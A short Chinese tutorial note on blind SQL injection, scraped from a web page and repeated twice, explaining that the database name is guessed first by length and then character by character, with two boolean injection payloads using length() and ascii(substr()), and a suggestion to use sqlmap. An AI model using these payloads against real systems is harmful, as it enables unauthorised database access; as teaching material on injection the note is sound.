sql盲注没有返回数据库内容,所以要猜。
先猜长度,再猜字符
1’and length(database())>1 #
1’ and ascii(substr(database(),1,1))>1 #
…好久好久
直接使用sqlmap来注入
相关文章:
猜你喜欢
相关资源
相似解决方案
热门标签
sql盲注没有返回数据库内容,所以要猜。
先猜长度,再猜字符
1’and length(database())>1 #
1’ and ascii(substr(database(),1,1))>1 #
…好久好久
直接使用sqlmap来注入
相关文章: